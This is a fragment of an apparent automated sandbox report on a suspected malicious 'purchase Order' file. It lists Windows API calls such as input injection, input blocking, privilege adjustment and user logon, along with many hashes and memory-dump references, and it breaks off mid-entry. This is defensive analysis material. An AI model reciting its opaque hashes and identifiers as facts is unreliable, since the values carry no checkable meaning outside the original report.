                                                        • Instruction Fuzzy Hash: AEF08C71100229BBDB20ABA4DC89FEA776DBF093A5F008165F91AE6191D7309A40DBA0
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C84153
                                                        • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00C84166
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: c04f213f672e06332bd0812fd963ca5d309a6131204548b457f0ef868398c405
                                                        • Instruction ID: f725d18024f2663c003551e2381d9417ef84d01aa429e28fad038d86c15a33fa
                                                        • Opcode Fuzzy Hash: c04f213f672e06332bd0812fd963ca5d309a6131204548b457f0ef868398c405
                                                        • Instruction Fuzzy Hash: 21F0677090024EAFDB059FA0C809BBE7BB0EF00309F00805AF966A6192D77986129FA4
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C7ACC0), ref: 00C7AB99
                                                        • CloseHandle.KERNEL32(?,?,00C7ACC0), ref: 00C7ABAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 1f3eb493546780edfc9b6088569e174b397fd962f121c40494e27b5f695b3910
                                                        • Instruction ID: 9d140a16378d89d97b72373ddae223eeb74d57a24de44e21ca80da82af2bafc4
                                                        • Opcode Fuzzy Hash: 1f3eb493546780edfc9b6088569e174b397fd962f121c40494e27b5f695b3910
                                                        • Instruction Fuzzy Hash: 9CE0E675000510AFE7262F54EC05E77B7E9EF44321710843DF85A81471D762ADD5DB50
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00C66DB3,-0000031A,?,?,00000001), ref: 00C681B1
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C681BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: a7432760f3799cc8d312d52804df1e367a82837ab52cf61ef9f19b3f96707d74
                                                        • Instruction ID: fdba757596318862962a40fd30e4a76c1d15bd462be7a6828884e97afb430940
                                                        • Opcode Fuzzy Hash: a7432760f3799cc8d312d52804df1e367a82837ab52cf61ef9f19b3f96707d74
                                                        • Instruction Fuzzy Hash: B6B09231044648ABDB002BA1EC09F5C7F78EB48652F094021F60E440718B7294508A92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: be4431e3d4988df1fa8de3281ee15f25952f1775063dd811e3421fe09f004a4f
                                                        • Instruction ID: f0cc2b8216e2c38ddb9be12b29d631ec6668506c795c2ecbf74c51133bbfa71a
                                                        • Opcode Fuzzy Hash: be4431e3d4988df1fa8de3281ee15f25952f1775063dd811e3421fe09f004a4f
                                                        • Instruction Fuzzy Hash: 87A23C74D04219CFDB24CF59C880BADBBB1FF49314F2582A9E869AB391D7349E81DB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02e419f01516178793901592c21bf59d3d38a4835083bb80c2d775fac4fc1122
                                                        • Instruction ID: 3b6fd5f166c66378adc0d48a36c48d34fd117ede4827c1792be565adb2a1909b
                                                        • Opcode Fuzzy Hash: 02e419f01516178793901592c21bf59d3d38a4835083bb80c2d775fac4fc1122
                                                        • Instruction Fuzzy Hash: 5A321522E29F414DD7335635DC62339A388AFB73C4F15D727E82AB59AADB28C5835100
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID:
                                                        • API String ID: 674341424-0
                                                        • Opcode ID: 9fa04629da6fb7fc506929a38e0dded9e288ed0e99547fa9e5cd598e1e904ddc
                                                        • Instruction ID: cd04c4b830d53d40a4f5e50bd853cdd9095aac233ce67c5aa429af51b64db968
                                                        • Opcode Fuzzy Hash: 9fa04629da6fb7fc506929a38e0dded9e288ed0e99547fa9e5cd598e1e904ddc
                                                        • Instruction Fuzzy Hash: B52275716083119FD724DF24C891BABB7E4FF84310F10492DF8AA9B291DB71EA45DB82
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c34a2f541853ff51d6d2360c1847c2dd1894f93349b09aaaf44ecc22e672c0c
                                                        • Instruction ID: c34701aa31bcd09a296697eb672eff60962f6e8aefd8a133d0d5fea9b4b9995d
                                                        • Opcode Fuzzy Hash: 7c34a2f541853ff51d6d2360c1847c2dd1894f93349b09aaaf44ecc22e672c0c
                                                        • Instruction Fuzzy Hash: 7AB1C220D2AF414DD7239639887133AB75C6FBB2D6F91D71BFC1A74D62EB2195834280
                                                        APIs
                                                        • __time64.LIBCMT ref: 00C8B6DF
                                                          • Part of subcall function 00C6344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C8BDC3,00000000,?,?,?,?,00C8BF70,00000000,?), ref: 00C63453
                                                          • Part of subcall function 00C6344A: __aulldiv.LIBCMT ref: 00C63473
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: b520c457cce20853f8de97039eba16f0b5976da95cb76d06c4c122faf6198cf9
                                                        • Instruction ID: 15255eabf01cd3ee419e175ed311a15f20a0f262e0acb227c0781f49f7cdaf4e
                                                        • Opcode Fuzzy Hash: b520c457cce20853f8de97039eba16f0b5976da95cb76d06c4c122faf6198cf9
                                                        • Instruction Fuzzy Hash: 8721A2726346108BC729CF28C481B92B7E5EB95314B248E7DE0E5CB2C0CB74BE05DB64
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00C96ACA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 7eb75f18ce9eb5e00cb171eb65451d9e0b35c82000b66f0bcbeefda40336d0e2
                                                        • Instruction ID: 9f4216e21ba12451b5f030736fe49acd22b91d84da9edea3c34f5207782e46d3
                                                        • Opcode Fuzzy Hash: 7eb75f18ce9eb5e00cb171eb65451d9e0b35c82000b66f0bcbeefda40336d0e2
                                                        • Instruction Fuzzy Hash: EEE048352002046FD700EF59D404E5AB7ECAFB4755F04C826F946D7291DEB4F8449B90
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C8750A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: bf4344816decbad961d6480892bafc2b0bce1f3d2febbccb83d3191b71d9984c
                                                        • Instruction ID: 2ba848d8dfde654539d2ab9f10bd0064a80ff197e9c8fedafc8836221eba1bed
                                                        • Opcode Fuzzy Hash: bf4344816decbad961d6480892bafc2b0bce1f3d2febbccb83d3191b71d9984c
                                                        • Instruction Fuzzy Hash: 27D09EA416C60579ED1A27249C1FFB71508F340789FF44749B623D90C0F8E4DE81A639
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C7AD3E), ref: 00C7B124
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 27d738df7f760a7da80ed426745faee831d8f4c9ce45760a76feb200032d3011
                                                        • Instruction ID: 340835d26fda8e400293f1ae1861a616374a67b22bc07364ce8fd92c3b94a48a
                                                        • Opcode Fuzzy Hash: 27d738df7f760a7da80ed426745faee831d8f4c9ce45760a76feb200032d3011
                                                        • Instruction Fuzzy Hash: B4D09E321A464EAEDF025FA4DC06FAE3F6AEB04701F448511FA16D50A1C675D532AB50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: a971f965472b6f6ce3bf6af142389e2e8975910db333bf52cddc72e889a3c8c9
                                                        • Instruction ID: 7f64fd81416802c87859f1a985b550f0f24946cfa1601f66782a404e160ceb16
                                                        • Opcode Fuzzy Hash: a971f965472b6f6ce3bf6af142389e2e8975910db333bf52cddc72e889a3c8c9
                                                        • Instruction Fuzzy Hash: EEC04CB1400109DFC751CBC4C944EEEBBBCAB04301F104091D146F1110D7709B459B72
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C6818F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 28d7beda655b0dda633cc054ea9504b60cfa5a79c6732f4ce0311146593705e8
                                                        • Instruction ID: a8e82ef1035bc4d417127a7b6734041722feffe225ef15935e279132beabba20
                                                        • Opcode Fuzzy Hash: 28d7beda655b0dda633cc054ea9504b60cfa5a79c6732f4ce0311146593705e8
                                                        • Instruction Fuzzy Hash: 49A0113000020CAB8F002B82EC08A883F2CEA002A0B080022F80E000308B22A8A08A82
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80f3694469823962b15e9bbaeac4b4ffe5c53a4453d3a22355ac8c85a1dfa9b3
                                                        • Instruction ID: b960cb91ec08db9f7ce9ef0084322727877a0d55e70b85cc35cbec1a1c7d7432
                                                        • Opcode Fuzzy Hash: 80f3694469823962b15e9bbaeac4b4ffe5c53a4453d3a22355ac8c85a1dfa9b3
                                                        • Instruction Fuzzy Hash: B922CD74904209CFDB24DF98C480AAEB7F0FF18314F168169ED6A9B351E731AE85DB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dcb56a4aea081b2cf69ff7a174727fb12bbca287c10922b9a5f58ba6e530cdc2
                                                        • Instruction ID: 83dcab7516377d381fe3080028e67239c2f1be0edb4d83662e2ab5331b88443d
                                                        • Opcode Fuzzy Hash: dcb56a4aea081b2cf69ff7a174727fb12bbca287c10922b9a5f58ba6e530cdc2
                                                        • Instruction Fuzzy Hash: 9C12BB70A002199FDF04DFA5D985AEEB3F5FF48300F208529E816E7294EB36AE11DB55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3728558374-0
                                                        • Opcode ID: b2de1b8f3bcc253f16fb07ae5657b39643cc0c0912a0aae36d01b274fd2f1b68
                                                        • Instruction ID: 1ea4e6ec95db1d7739909e3eca48b1bc8ac49eef95f52d42c49ab89f084370f8
                                                        • Opcode Fuzzy Hash: b2de1b8f3bcc253f16fb07ae5657b39643cc0c0912a0aae36d01b274fd2f1b68
                                                        • Instruction Fuzzy Hash: D302C1B0A00209DFDF18DF68D991AAEBBB5FF48300F108469E806DB255EB31DE55DB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction ID: 59386fffb9251573e0dda5a37e1fab3151aad2cbf029760b1c93393b278684ed
                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction Fuzzy Hash: 22C1D6362051930ADF3D463AC47543FBBA15EA17B232A076DD8B3DB5D1EF60CA68D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction ID: 71eb6a95ec0744201c8e7d7b00ceb9a1a10e25e2316ac0aed32bf768e2e2bfe5
                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction Fuzzy Hash: E3C1D73620519309DF3D463AC47543FBBA15EA27B232A076DD8B3DB4D5EF20CA68D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 7024a6671a5fa7ce638882aa4b92471e9b4e290574da5ae8ab252451083f0768
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: E9C1D53A20509309DF2D463AD43543EBAA15AA17B331A077DDCB3CB4D5EF10DAAED624
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: eb8e09efa1ded24fc7ac646d236dfdcabe32ab26084a795542bdf037f987812f
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: 9A41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: ac591c3d00bf2963a0104d03450a24b5b5c1353ac7c0c17c2f747e6413a72d99
